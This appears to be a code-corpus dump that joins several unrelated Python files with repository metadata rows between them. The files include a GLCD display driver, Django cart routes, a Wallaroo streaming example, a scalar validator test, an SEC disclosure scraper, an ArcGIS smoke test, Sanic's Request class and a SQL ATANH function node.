            GPIO.output(self.E1, True)
            GPIO.output(self.E2, True)
            time.sleep(self.E_PULSE)
            GPIO.output(self.E1, False)
            GPIO.output(self.E2, False)
            time.sleep(self.E_DELAY)
        # elif(currentScreen == 1):
        # print("cs1")
        # time.sleep(self.E_DELAY)
        # GPIO.output(self.E2, True)
        # time.sleep(self.E_PULSE)
        # GPIO.output(self.E2, False)
        # time.sleep(self.E_DELAY)
        # Waiting write operation complete by listening BUSY singal
        # GPIO.setup(self.D7, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
        # GPIO.output(self.RW,1)
        # GPIO.output(self.RS,0)
        # time.sleep(self.E_DELAY)
        # GPIO.output(self.E, True)
        # time.sleep(self.E_PULSE)
        # GPIO.output(self.E, False)
        # time.sleep(self.E_DELAY)
        #Wait until BUSY(D7) is off
        # while GPIO.input(self.D7):
        # pass
        # GPIO.setup(self.D7, GPIO.OUT) # set D7 back to Output
class LCD12864(object):
    """High-level driver for a 128x64 GLCD split across two controllers
    of 64 columns each, accessed through an LCD_GPIO driver.

    NOTE(review): the command bytes (0xB8 page-set, 0x40 address-set,
    0x3F display-on) match the KS0108 command set — confirm against the
    display datasheet.
    """
    def __init__(self, driver):
        self.driver = driver
        self.lcd_init()
    def setPage(self, value):
        """Select page (8-pixel row band) 0-7 on the active controller."""
        # set y=value * 8
        self.driver.lcd_byte(0xB8|(value&0x07),0)
    def setAddress(self, value):
        """Select column 0-63 on the active controller."""
        # set x=value
        self.driver.lcd_byte(0x40|(value&0x3F),0)
    def lcd_cls(self):
        """Clear the whole screen on both controllers."""
        # clear screen by write 0x00 to all display memory
        self.driver.useDisp1()
        for y in range(8):
            self.setPage(y)
            self.setAddress(0)
            for i in range(64):
                self.driver.lcd_byte(0x00,1)
        self.driver.useDisp2()
        for y in range(8):
            self.setPage(y)
            self.setAddress(0)
            for i in range(64):
                self.driver.lcd_byte(0x00,1)
    def lcd_init(self):
        """Turn both controllers on (0x3F command), issued twice.

        NOTE(review): `currentScreen` here is a local, not the module
        global, so these assignments have no effect outside this method.
        """
        currentScreen = 0
        self.driver.useDisp1()
        self.driver.lcd_byte(0x3F,0)
        self.driver.useDisp2()
        self.driver.lcd_byte(0x3F,0)
        currentScreen = 1
        self.driver.useDisp1()
        self.driver.lcd_byte(0x3F,0)
        self.driver.useDisp2()
        self.driver.lcd_byte(0x3F,0)
driver = LCD_GPIO(RS=4,RW=17,E1=27,E2=7,D0=22,D1=10,D2=9,D3=11,D4=5,D5=6,D6=13,D7=19,CS1=26,CS2=21,RST=20)
lcd = LCD12864(driver=driver)
def getHexCode(string):
    """Yield the font column bytes (fontWidth per character) for *string*.

    Characters index into fonts.font6x7, offset from ASCII space (32).
    """
    for ch in string:
        for i in range(fontWidth):
            yield fonts.font6x7[(ord(ch)-32)*fontWidth+i]
def displayText(string, lineNumber, byteNumber, screen):
    """Render *string* with the 6x7 font at page *lineNumber*, starting at
    column *byteNumber* (0-127), clipping at the right screen edge.

    Columns 0-63 live on controller 1 and 64-127 on controller 2; a string
    crossing column 64 is split across both controllers.
    """
    global currentScreen
    currentScreen = screen
    byteStream = getHexCode(string)
    byteStreamLength = len(string)*fontWidth
    # Clip to the columns remaining on this row.
    if (byteStreamLength>127-byteNumber+1):
        byteStreamLength=(127-byteNumber+1)
    if (byteNumber < 64):
        lcd.driver.useDisp1()
        lcd.setPage(lineNumber)
        lcd.setAddress(byteNumber)
        if(byteStreamLength > 64 - byteNumber):
            # Text crosses the controller boundary: finish the left half,
            # then continue from column 0 of controller 2.
            for i in range(0,64-byteNumber):
                lcd.driver.lcd_byte(next(byteStream),1)
            lcd.driver.useDisp2()
            lcd.setPage(lineNumber)
            lcd.setAddress(0)
            for i in range(64-byteNumber,byteStreamLength-1):
                lcd.driver.lcd_byte(next(byteStream),1)
            return
        else:
            for i in range(0,byteStreamLength-1):
                lcd.driver.lcd_byte(next(byteStream),1)
            return
    else:
        # Entirely on the right half: address is relative to controller 2.
        lcd.driver.useDisp2()
        lcd.setPage(lineNumber)
        lcd.setAddress(byteNumber-64)
        for i in range (0,byteStreamLength-1):
            lcd.driver.lcd_byte(next(byteStream),1)
def clearDisplay(screen):
    # Record which screen index is considered active, then blank the LCD.
    global currentScreen
    currentScreen = screen
    lcd.lcd_cls()
if __name__ == "__main__":
    # Demo: blank screen 0, then blank screen 1 and show a centered
    # two-line greeting ("{:^21}" centers the text in a 21-char field).
    clearDisplay(0)
    print("hi")
    # displayText("{:^21}".format("Project Hexa"),3,1,0)
    # displayText("{:^21}".format(" Welcomes You!! "),4,1,0)
    clearDisplay(1)
    displayText("{:^21}".format("Project Hexa"),3,1,1)
    displayText("{:^21}".format(" Welcomes You!! "),4,1,1)
    # GPIO.cleanup()
| 29.259259
| 106
| 0.561885
|
4a15bef2660d2d4901173fdeabcd9d97a308058d
| 382
|
py
|
Python
|
plataform/urls.py
|
marssaljr/pharmalegre
|
05d275d858621fb62226585d8c5b6e12189615fb
|
[
"MIT"
] | null | null | null |
plataform/urls.py
|
marssaljr/pharmalegre
|
05d275d858621fb62226585d8c5b6e12189615fb
|
[
"MIT"
] | null | null | null |
plataform/urls.py
|
marssaljr/pharmalegre
|
05d275d858621fb62226585d8c5b6e12189615fb
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
# URL routes: storefront home page plus the cart-management endpoints.
# <str:id> is the item identifier consumed by the cart views.
urlpatterns = [
    path('', views.home, name="home"),
    path('cart/add/<str:id>', views.cart, name='cart_add'),
    path('cart/inc/<str:id>', views.item_increment, name='item_increment'),
    path('cart/del/<str:id>', views.item_decrement, name='item_decrement'),
    path('cart/detail', views.cart_detail, name='cart_detail')
]
| 34.727273
| 75
| 0.67801
|
4a15bf87728cfb07e5ed670c113ea01094db3f5b
| 2,669
|
py
|
Python
|
examples/python/alphabet_partitioned/alphabet_partitioned.py
|
awesome-archive/wallaroo
|
852c19ffad0ed75a767a658a9a72c355e3c4c1c8
|
[
"Apache-2.0"
] | null | null | null |
examples/python/alphabet_partitioned/alphabet_partitioned.py
|
awesome-archive/wallaroo
|
852c19ffad0ed75a767a658a9a72c355e3c4c1c8
|
[
"Apache-2.0"
] | null | null | null |
examples/python/alphabet_partitioned/alphabet_partitioned.py
|
awesome-archive/wallaroo
|
852c19ffad0ed75a767a658a9a72c355e3c4c1c8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The Wallaroo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import string
import struct
import pickle
import wallaroo
def application_setup(args):
    """Assemble the 'alphabet' Wallaroo application: a TCP source feeding
    a vote-counting state partitioned by letter, draining into a TCP sink.
    Returns the built application topology."""
    source_host, source_port = wallaroo.tcp_parse_input_addrs(args)[0]
    sink_host, sink_port = wallaroo.tcp_parse_output_addrs(args)[0]
    # One partition per lowercase ASCII letter.
    partitions = list(string.ascii_lowercase)
    builder = wallaroo.ApplicationBuilder("alphabet")
    builder.new_pipeline(
        "alphabet",
        wallaroo.TCPSourceConfig(source_host, source_port, Decoder()))
    builder.to_state_partition(
        AddVotes(), LetterStateBuilder(), "letter state",
        LetterPartitionFunction(), partitions)
    builder.to_sink(wallaroo.TCPSinkConfig(sink_host, sink_port, Encoder()))
    return builder.build()
def serialize(o):
    """Serialize *o* to bytes using pickle (Wallaroo serialization hook)."""
    return pickle.dumps(o)
def deserialize(bs):
    """Rebuild an object from pickled bytes (Wallaroo deserialization hook)."""
    return pickle.loads(bs)
class LetterPartitionFunction(object):
    """Routes a votes message by the first character of its 'letter' field."""
    def partition(self, data):
        """Return the partition key for *data*."""
        letter = data.letter
        return letter[0]
class LetterStateBuilder(object):
    """Factory producing a fresh TotalVotes state object per partition."""
    def build(self):
        """Create and return the empty per-letter tally."""
        return TotalVotes()
class TotalVotes(object):
    """Running vote tally for a single letter partition."""
    def __init__(self):
        # 'X' is the placeholder letter until the first update arrives.
        self.letter = 'X'
        self.votes = 0
    def update(self, votes):
        """Fold one incoming votes message into the tally."""
        self.letter = votes.letter
        self.votes = self.votes + votes.votes
    def get_votes(self):
        """Snapshot the current tally as a Votes message."""
        return Votes(self.letter, self.votes)
class Votes(object):
    """Message pairing a letter with a vote count."""
    def __init__(self, letter, votes):
        self.letter = letter
        self.votes = votes
class Decoder(object):
    """Frame decoder: a 4-byte big-endian length header, then a payload of
    one letter byte followed by a 32-bit big-endian vote count."""
    def header_length(self):
        """The length prefix is a big-endian unsigned 32-bit integer."""
        return 4
    def payload_length(self, bs):
        """Decode the length prefix into the payload byte count."""
        (length,) = struct.unpack(">I", bs)
        return length
    def decode(self, bs):
        """Turn a raw payload into a Votes message."""
        letter, vote_count = struct.unpack(">1sI", bs)
        return Votes(letter, vote_count)
class AddVotes(object):
    """Stateful computation: merge incoming votes into the partition state
    and emit the updated tally downstream."""
    def name(self):
        return "add votes"
    def compute(self, data, state):
        """Apply *data* to *state*; (output, True) signals state changed."""
        state.update(data)
        return (state.get_votes(), True)
class Encoder(object):
    # Frames an outgoing Votes message as: 4-byte big-endian length field
    # (9 = 1 letter byte + 8 vote-count bytes), one letter byte, 64-bit
    # big-endian vote count (">LsQ").
    # NOTE(review): the bare 'print' statements below are Python 2 syntax,
    # so this module targets Python 2.
    def encode(self, data):
        # data is a Votes
        letter = data.letter
        votes = data.votes
        print "letter is " + str(letter)
        print "votes is " + str(votes)
        return struct.pack(">LsQ", 9, data.letter, data.votes)
| 25.912621
| 75
| 0.66804
|
4a15bfdf47eff289ea73f93921f99d5a53e0877d
| 2,843
|
py
|
Python
|
src/barril/units/scalar_validation/_tests/test_scalar_min_max_validator.py
|
jaimeambrus/barril
|
2897a93c660a9064f954912cc44f000d8e06a085
|
[
"MIT"
] | null | null | null |
src/barril/units/scalar_validation/_tests/test_scalar_min_max_validator.py
|
jaimeambrus/barril
|
2897a93c660a9064f954912cc44f000d8e06a085
|
[
"MIT"
] | null | null | null |
src/barril/units/scalar_validation/_tests/test_scalar_min_max_validator.py
|
jaimeambrus/barril
|
2897a93c660a9064f954912cc44f000d8e06a085
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, unicode_literals
from barril.units import Scalar
from barril.units.scalar_validation.scalar_min_max_validator import (
ScalarMinMaxValidator
)
def _CreateTestCategories(db):
db.AddCategory(
category="test category",
quantity_type="dimensionless",
override=True,
default_unit="-",
min_value=1.0,
max_value=50.0,
valid_units="-",
is_min_exclusive=False,
is_max_exclusive=False,
)
db.AddCategory(
category="category exclusive",
quantity_type="dimensionless",
override=True,
default_unit="-",
min_value=1.0,
max_value=50.0,
valid_units="-",
is_min_exclusive=True,
is_max_exclusive=True,
default_value=5.0,
)
def testScalarValidationMsgs(unit_database):
    """Check the error messages produced by ScalarMinMaxValidator for
    values below/above the category bounds, with both inclusive and
    exclusive limits (None means the value is valid)."""
    def _Check(scalar, value, unit, expected_msg):
        # Copy the scalar with the probe value and compare the message.
        some_scalar = scalar.CreateCopy(value=value, unit=unit)
        obtained_msg = ScalarMinMaxValidator.CreateScalarCheckErrorMsg(
            some_scalar, "Some Property"
        )
        assert obtained_msg == expected_msg
    _CreateTestCategories(unit_database)
    some_scalar = Scalar("test category", 10.0, "-")
    # Test value below minimum -----------------------------------------------------------------
    expected_error_msg = "Error in Some Property. Invalid value for Test Category: 0. Must be greater or equal to 1.0."
    _Check(some_scalar, 0.0, "-", expected_error_msg)
    # Test value above maximum -----------------------------------------------------------------
    expected_error_msg = "Error in Some Property. Invalid value for Test Category: 51. Must be less or equal to 50.0."
    _Check(some_scalar, 51.0, "-", expected_error_msg)
    # Test no error without exclusive ----------------------------------------------------------
    _Check(some_scalar, 1.0, "-", None)
    _Check(some_scalar, 50.0, "-", None)
    # Test using min and max exclusive ---------------------------------------------------------
    some_scalar = Scalar("category exclusive", 10.0, "-")
    # Test value below minimum -----------------------------------------------------------------
    expected_error_msg = "Error in Some Property. Invalid value for Category Exclusive: 1. Must be greater than 1.0."
    _Check(some_scalar, 1.0, "-", expected_error_msg)
    # Test value above maximum -----------------------------------------------------------------
    expected_error_msg = "Error in Some Property. Invalid value for Category Exclusive: 50. Must be less than 50.0."
    _Check(some_scalar, 50.0, "-", expected_error_msg)
    # Test no error with exclusive -------------------------------------------------------------
    _Check(some_scalar, 49.0, "-", None)
    _Check(some_scalar, 2.0, "-", None)
| 38.418919
| 119
| 0.569117
|
4a15c0386228a1e0453d5b665e3b600c3bb35e37
| 1,612
|
py
|
Python
|
sec_scraper.py
|
bjk116/StockACTTracker
|
6d91dd49ca9aec3a005f6a681670da5ab0c7d4ca
|
[
"MIT"
] | null | null | null |
sec_scraper.py
|
bjk116/StockACTTracker
|
6d91dd49ca9aec3a005f6a681670da5ab0c7d4ca
|
[
"MIT"
] | null | null | null |
sec_scraper.py
|
bjk116/StockACTTracker
|
6d91dd49ca9aec3a005f6a681670da5ab0c7d4ca
|
[
"MIT"
] | null | null | null |
import requests
import datetime
# zach will need to install this
# pip install beautifulsoup4
# if that doesn't work
# pip3 install beautifulsoup4
from bs4 import BeautifulSoup
# pip3 install requests-html
# or
# pip install
# Required as sec website is created in js and needs to be rendered
from requests_html import HTMLSession
# comment out for now so this is runnable with minimimal install
#import db
#import queries
SEC_SENATE_STOCK_DISCLOSURE_URL = "https://sec.report/Senate-Stock-Disclosures"
# Possible transaction resource - DATA_SOURCE = "https://senate-stock-watcher-data.s3-us-west-2.amazonaws.com/aggregate/all_transactions_for_senators.json"
def getHTML():
    """Fetch the SEC senate stock disclosures page, render its client-side
    JavaScript, and return the parsed BeautifulSoup document."""
    session = HTMLSession()
    response = session.get(SEC_SENATE_STOCK_DISCLOSURE_URL)
    # The page is built in JS, so it must be rendered before parsing.
    response.html.render(sleep=1, keep_page=True, scrolldown=1)
    return BeautifulSoup(response.text, 'html.parser')
def getDataTable(soup):
    """Return the first element with CSS class 'table' from *soup*."""
    return soup.find(class_='table')
def populateTransactions():
    """Scrape the disclosure table and collect its header labels.

    Returns a tuple (table, header_columns): 'table' is the BeautifulSoup
    element with class 'table'; 'header_columns' lists the column names
    taken from the <th> cells, using the text of nested <a> links when a
    header wraps its label in links.  Row parsing is still a stub.
    """
    soup = getHTML()
    table = getDataTable(soup)
    # Construct columns: a <th> may carry its label in one or more links.
    header_columns = []
    for header in table.find_all('th'):
        links = header.find_all('a')  # hoisted: was queried twice per header
        if links:
            for link in links:
                header_columns.append(link.text)
                print(f"appending link text {link.text}")  # fixed typo: "apeending"
        else:
            print(f"appending header text {header.text}")
            header_columns.append(header.text)
    print(header_columns)
    for row in table.tbody.find_all('tr'):
        columns = row.find_all('td')
        if len(columns) > 0:
            pass  # TODO: parse each row into a transaction record
    return table, header_columns
| 31
| 155
| 0.69727
|
4a15c18e5abaacb1f34bc0a0197b5c7e18538367
| 3,257
|
py
|
Python
|
data_management/test/test_scanned_map_tools/TemplateConfigTest.py
|
conklinbd/solutions-geoprocessing-toolbox
|
7afab793ea34b7e7cb7e32757e8a150b6637ffd2
|
[
"Apache-2.0"
] | null | null | null |
data_management/test/test_scanned_map_tools/TemplateConfigTest.py
|
conklinbd/solutions-geoprocessing-toolbox
|
7afab793ea34b7e7cb7e32757e8a150b6637ffd2
|
[
"Apache-2.0"
] | null | null | null |
data_management/test/test_scanned_map_tools/TemplateConfigTest.py
|
conklinbd/solutions-geoprocessing-toolbox
|
7afab793ea34b7e7cb7e32757e8a150b6637ffd2
|
[
"Apache-2.0"
] | 1
|
2018-10-25T15:52:41.000Z
|
2018-10-25T15:52:41.000Z
|
#------------------------------------------------------------------------------
# Copyright 2013 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#------------------------------------------------------------------------------
# TemplateConfigTest.py
# Description: Common objects/methods used by test scripts
# Requirements: ArcGIS Desktop Standard
# ----------------------------------------------------------------------------
import arcpy
import os
import sys
import traceback
import TestUtilities
# Smoke test: verify ArcPy imports, that all required paths exist, and that
# the key geo objects (toolbox, input GDB) can be described.  Exits with -1
# on any failure so a calling harness can detect it.
try:
    print("Testing ArcPy")
    arcpy.AddMessage("ArcPy works")
    # WORKAROUND: delete scratch db (having problems with scratch read-only "scheme lock" errors
    # print "Deleting Scratch Workspace (Workaround)"
    # TestUtilities.deleteScratch()
    print("Testing Necessary Paths")
    print("Running from: " + str(TestUtilities.currentPath))
    paths2Check = []
    paths2Check.extend([TestUtilities.geodatabasePath, TestUtilities.toolboxesPath,TestUtilities.sampleInputPath])
    for path2check in paths2Check :
        if os.path.exists(path2check) :
            print("Valid Path: " + path2check)
        else :
            print("ERROR: Necessary Path not found: " + path2check )
            raise Exception('Bad Path')
    # WORKAROUND
    # print "Creating New Scratch Workspace (Workaround)"
    # TestUtilities.createScratch()
    # NOTE(review): bare 'print' statement below is Python 2 syntax -- this
    # script targets Python 2 despite the parenthesized prints elsewhere.
    print "Testing Necessary Geo Objects"
    objects2Check = []
    objects2Check.extend([TestUtilities.toolbox, TestUtilities.inputGDB])
    for object2Check in objects2Check :
        desc = arcpy.Describe(object2Check)
        if desc == None :
            print("--> Invalid Object: " + str(object2Check) )
            arcpy.AddError("Bad Input")
            raise Exception('Bad Input')
        else :
            print("Valid Object: " + desc.Name )
    print("Test Successful")
except arcpy.ExecuteError:
    # Get the arcpy error messages
    msgs = arcpy.GetMessages()
    arcpy.AddError(msgs)
    print(msgs)
    # return a system error code
    sys.exit(-1)
except:
    # Get the traceback object
    tb = sys.exc_info()[2]
    tbinfo = traceback.format_tb(tb)[0]
    # Concatenate information together concerning the error into a message string
    pymsg = "PYTHON ERRORS:\nTraceback info:\n" + tbinfo + "\nError Info:\n" + str(sys.exc_info()[1])
    msgs = "ArcPy ERRORS:\n" + arcpy.GetMessages() + "\n"
    # Return python error messages for use in script tool or Python Window
    arcpy.AddError(pymsg)
    arcpy.AddError(msgs)
    # Print Python error messages for use in Python / Python Window
    print(pymsg + "\n")
    print(msgs)
    # return a system error code
    sys.exit(-1)
| 34.284211
| 114
| 0.619896
|
4a15c22f97d5e055b3e5e40200f2ff49950ac12e
| 7,603
|
py
|
Python
|
sanic/request.py
|
matemax/sanic
|
ca419c151e404d8267434f42674d8c223b2edd60
|
[
"MIT"
] | 1
|
2019-08-04T09:42:09.000Z
|
2019-08-04T09:42:09.000Z
|
sanic/request.py
|
matemax/sanic
|
ca419c151e404d8267434f42674d8c223b2edd60
|
[
"MIT"
] | null | null | null |
sanic/request.py
|
matemax/sanic
|
ca419c151e404d8267434f42674d8c223b2edd60
|
[
"MIT"
] | 1
|
2019-08-04T09:42:10.000Z
|
2019-08-04T09:42:10.000Z
|
from cgi import parse_header
from collections import namedtuple
from http.cookies import SimpleCookie
from httptools import parse_url
from urllib.parse import parse_qs, urlunparse
try:
from ujson import loads as json_loads
except ImportError:
from json import loads as json_loads
from sanic.exceptions import InvalidUsage
from sanic.log import log
DEFAULT_HTTP_CONTENT_TYPE = "application/octet-stream"
# HTTP/1.1: https://www.w3.org/Protocols/rfc2616/rfc2616-sec7.html#sec7.2.1
# > If the media type remains unknown, the recipient SHOULD treat it
# > as type "application/octet-stream"
class RequestParameters(dict):
    """A dict whose values are lists: 'get' yields the first element of a
    key's list (or the default), while 'getlist' yields the whole list."""
    def get(self, name, default=None):
        """Return the first stored value for *name*, or *default*."""
        values = super().get(name, [default])
        return values[0]
    def getlist(self, name, default=None):
        """Return the full list of values for *name*, or *default*."""
        return super().get(name, default)
class Request(dict):
    """Properties of an HTTP request such as URL, headers, etc."""
    # __slots__ keeps per-request memory small; parsed_* fields cache the
    # lazily-computed body/query parses below.
    __slots__ = (
        'app', 'headers', 'version', 'method', '_cookies', 'transport',
        'body', 'parsed_json', 'parsed_args', 'parsed_form', 'parsed_files',
        '_ip', '_parsed_url',
    )
    def __init__(self, url_bytes, headers, version, method, transport):
        # TODO: Content-Encoding detection
        self._parsed_url = parse_url(url_bytes)
        self.app = None
        self.headers = headers
        self.version = version
        self.method = method
        self.transport = transport
        # Init but do not inhale
        self.body = []
        self.parsed_json = None
        self.parsed_form = None
        self.parsed_files = None
        self.parsed_args = None
        self._cookies = None
    @property
    def json(self):
        # Lazily parse the body as JSON and cache it.  An empty body yields
        # None; a non-empty unparsable body raises InvalidUsage.
        if self.parsed_json is None:
            try:
                self.parsed_json = json_loads(self.body)
            except Exception:
                if not self.body:
                    return None
                raise InvalidUsage("Failed when parsing body as json")
        return self.parsed_json
    @property
    def token(self):
        """Attempt to return the auth header token.
        :return: token related to request
        """
        # Takes the second whitespace-separated field, e.g. "Bearer <token>".
        auth_header = self.headers.get('Authorization')
        if auth_header is not None:
            return auth_header.split()[1]
        return auth_header
    @property
    def form(self):
        # Lazily parse the body as urlencoded or multipart form data; on
        # failure the exception is logged and an empty result is returned.
        if self.parsed_form is None:
            self.parsed_form = RequestParameters()
            self.parsed_files = RequestParameters()
            content_type = self.headers.get(
                'Content-Type', DEFAULT_HTTP_CONTENT_TYPE)
            content_type, parameters = parse_header(content_type)
            try:
                if content_type == 'application/x-www-form-urlencoded':
                    self.parsed_form = RequestParameters(
                        parse_qs(self.body.decode('utf-8')))
                elif content_type == 'multipart/form-data':
                    # TODO: Stream this instead of reading to/from memory
                    boundary = parameters['boundary'].encode('utf-8')
                    self.parsed_form, self.parsed_files = (
                        parse_multipart_form(self.body, boundary))
            except Exception:
                log.exception("Failed when parsing form")
        return self.parsed_form
    @property
    def files(self):
        # Uploaded files are produced as a side effect of parsing the form.
        if self.parsed_files is None:
            self.form  # compute form to get files
        return self.parsed_files
    @property
    def args(self):
        # Lazily parse the query string into a RequestParameters.
        if self.parsed_args is None:
            if self.query_string:
                self.parsed_args = RequestParameters(
                    parse_qs(self.query_string))
            else:
                self.parsed_args = RequestParameters()
        return self.parsed_args
    @property
    def raw_args(self):
        # Flattened view of args: only the first value per key.
        return {k: v[0] for k, v in self.args.items()}
    @property
    def cookies(self):
        # Parse the Cookie header once into a plain {name: value} dict.
        if self._cookies is None:
            cookie = self.headers.get('Cookie') or self.headers.get('cookie')
            if cookie is not None:
                cookies = SimpleCookie()
                cookies.load(cookie)
                self._cookies = {name: cookie.value
                                 for name, cookie in cookies.items()}
            else:
                self._cookies = {}
        return self._cookies
    @property
    def ip(self):
        # Peer address from the transport, cached on first access.
        if not hasattr(self, '_ip'):
            self._ip = self.transport.get_extra_info('peername')
        return self._ip
    @property
    def scheme(self):
        # 'ws'/'http', with an 's' appended when TLS is active.
        if self.app.websocket_enabled \
                and self.headers.get('upgrade') == 'websocket':
            scheme = 'ws'
        else:
            scheme = 'http'
        if self.transport.get_extra_info('sslcontext'):
            scheme += 's'
        return scheme
    @property
    def host(self):
        # it appears that httptools doesn't return the host
        # so pull it from the headers
        return self.headers.get('Host', '')
    @property
    def path(self):
        return self._parsed_url.path.decode('utf-8')
    @property
    def query_string(self):
        if self._parsed_url.query:
            return self._parsed_url.query.decode('utf-8')
        else:
            return ''
    @property
    def url(self):
        # Reassemble the full URL from its components (no params/fragment).
        return urlunparse((
            self.scheme,
            self.host,
            self.path,
            None,
            self.query_string,
            None))
# One uploaded file from a multipart form: content type, raw body bytes, filename.
File = namedtuple('File', ['type', 'body', 'name'])
def parse_multipart_form(body, boundary):
    """Parse a request body and returns fields and files
    :param body: bytes request body
    :param boundary: bytes multipart boundary
    :return: fields (RequestParameters), files (RequestParameters)
    """
    files = RequestParameters()
    fields = RequestParameters()
    # Split on the boundary; the first and last fragments are the preamble
    # and the closing delimiter, so only the middle parts are form parts.
    form_parts = body.split(boundary)
    for form_part in form_parts[1:-1]:
        file_name = None
        file_type = None
        field_name = None
        line_index = 2  # skip the leading CRLF after the boundary
        line_end_index = 0
        # Read header lines until the blank line separating headers from data.
        while not line_end_index == -1:
            line_end_index = form_part.find(b'\r\n', line_index)
            form_line = form_part[line_index:line_end_index].decode('utf-8')
            line_index = line_end_index + 2
            if not form_line:
                break
            colon_index = form_line.index(':')
            form_header_field = form_line[0:colon_index]
            form_header_value, form_parameters = parse_header(
                form_line[colon_index + 2:])
            if form_header_field == 'Content-Disposition':
                if 'filename' in form_parameters:
                    file_name = form_parameters['filename']
                field_name = form_parameters.get('name')
            elif form_header_field == 'Content-Type':
                file_type = form_header_value
        # The data runs to 4 bytes before the end -- presumably dropping the
        # trailing '\r\n--' preceding the next boundary; TODO confirm.
        post_data = form_part[line_index:-4]
        if file_name or file_type:
            # A filename or explicit content type marks this part as a file.
            file = File(type=file_type, name=file_name, body=post_data)
            if field_name in files:
                files[field_name].append(file)
            else:
                files[field_name] = [file]
        else:
            value = post_data.decode('utf-8')
            if field_name in fields:
                fields[field_name].append(value)
            else:
                fields[field_name] = [value]
    return fields, files
| 31.288066
| 77
| 0.587137
|
4a15c288de720d5a2635472947e914c6bc72d8ae
| 2,160
|
py
|
Python
|
parser/fase2/team22/Instrucciones/FunctionTrigonometric/Atanh.py
|
Josue-Zea/tytus
|
f9e4be9a8c03eb698fade7a748972e4f52d46685
|
[
"MIT"
] | 35
|
2020-12-07T03:11:43.000Z
|
2021-04-15T17:38:16.000Z
|
parser/fase2/team22/Instrucciones/FunctionTrigonometric/Atanh.py
|
Josue-Zea/tytus
|
f9e4be9a8c03eb698fade7a748972e4f52d46685
|
[
"MIT"
] | 47
|
2020-12-09T01:29:09.000Z
|
2021-01-13T05:37:50.000Z
|
parser/fase2/team22/Instrucciones/FunctionTrigonometric/Atanh.py
|
Josue-Zea/tytus
|
f9e4be9a8c03eb698fade7a748972e4f52d46685
|
[
"MIT"
] | 556
|
2020-12-07T03:13:31.000Z
|
2021-06-17T17:41:10.000Z
|
import math
from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.TablaSimbolos.Tipo import Tipo_Dato, Tipo
from Instrucciones.Excepcion import Excepcion
from Instrucciones.TablaSimbolos import Instruccion3D as c3d
from Optimizador.C3D import Valor as ClassValor
from Optimizador.C3D import OP_ARITMETICO as ClassOP_ARITMETICO
from Optimizador.C3D import Identificador as ClassIdentificador
class Atanh(Instruccion):
    """SQL function ATANH(x): inverse hyperbolic tangent, typed as
    DOUBLE PRECISION.  Produces a semantic error (Excepcion) for
    non-numeric argument types or inputs outside atanh's domain."""
    def __init__(self, valor, strGram,linea, columna):
        Instruccion.__init__(self,Tipo(Tipo_Dato.DOUBLE_PRECISION),linea,columna,strGram)
        # Expression node whose evaluated value is passed to atanh.
        self.valor = valor
    def ejecutar(self, tabla, arbol):
        # Evaluate the argument; propagate an Excepcion unchanged.
        super().ejecutar(tabla,arbol)
        resultado = self.valor.ejecutar(tabla,arbol)
        if isinstance(resultado, Excepcion):
            return resultado
        # Only the numeric SQL types are accepted (error code 42883:
        # undefined function for this argument type).
        if self.valor.tipo.tipo != Tipo_Dato.SMALLINT and self.valor.tipo.tipo != Tipo_Dato.INTEGER and self.valor.tipo.tipo != Tipo_Dato.BIGINT and self.valor.tipo.tipo != Tipo_Dato.DECIMAL and self.valor.tipo.tipo != Tipo_Dato.NUMERIC and self.valor.tipo.tipo != Tipo_Dato.REAL and self.valor.tipo.tipo != Tipo_Dato.DOUBLE_PRECISION:
            error = Excepcion('42883',"Semántico","No existe la función atanh("+self.valor.tipo.toString()+")",self.linea,self.columna)
            arbol.excepciones.append(error)
            arbol.consola.append(error.toString())
            return error
        try:
            return math.atanh(resultado)
        except ValueError as c:
            # math.atanh raises ValueError for |x| >= 1 (error code 22003:
            # value out of range).
            error = Excepcion('22003',"Semántico","La entrada está fuera de rango",self.linea,self.columna)
            arbol.excepciones.append(error)
            arbol.consola.append(error.toString())
            return error
    def generar3D(self, tabla, arbol):
        # Emit three-address code: append an ATANH(...) string expression to
        # the current temporal via string concatenation (SUMA).
        super().generar3D(tabla,arbol)
        code = []
        code.append(c3d.asignacionH())
        code.append(c3d.aumentarP())
        t0 = c3d.getLastTemporal()
        t1 = c3d.getTemporal()
        code.append(c3d.operacion(t1, ClassIdentificador(t0), ClassValor("\"ATANH(" + str(self.valor.generar3D(tabla, arbol)) + ")\"", "STRING"), ClassOP_ARITMETICO.SUMA))
        return code
| 51.428571
| 335
| 0.700926
|
4a15c36a1b3fa72126ffece343c99e4ff2f59867
| 15,109
|
py
|
Python
|
rpython/jit/codewriter/flatten.py
|
Qointum/pypy
|
c0ed88efbc135a75a535f4534ca1f3baf0bf39d8
|
[
"Apache-2.0",
"OpenSSL"
] | 34
|
2015-07-09T04:53:27.000Z
|
2021-07-19T05:22:27.000Z
|
idea2/pypyjs-3/deps/pypy/rpython/jit/codewriter/flatten.py
|
igormcoelho/neo-boa
|
c141b503183cab287744cd19be5dfd86d9bc8daf
|
[
"MIT"
] | 6
|
2015-05-30T17:20:45.000Z
|
2017-06-12T14:29:23.000Z
|
idea2/pypyjs-3/deps/pypy/rpython/jit/codewriter/flatten.py
|
igormcoelho/neo-boa
|
c141b503183cab287744cd19be5dfd86d9bc8daf
|
[
"MIT"
] | 11
|
2015-09-07T14:26:08.000Z
|
2020-04-10T07:20:41.000Z
|
from rpython.flowspace.model import Variable, Constant
from rpython.jit.metainterp.history import AbstractDescr, getkind
from rpython.rtyper.lltypesystem import lltype
class SSARepr(object):
    """Flat, label-based representation of a graph: a name plus the list of
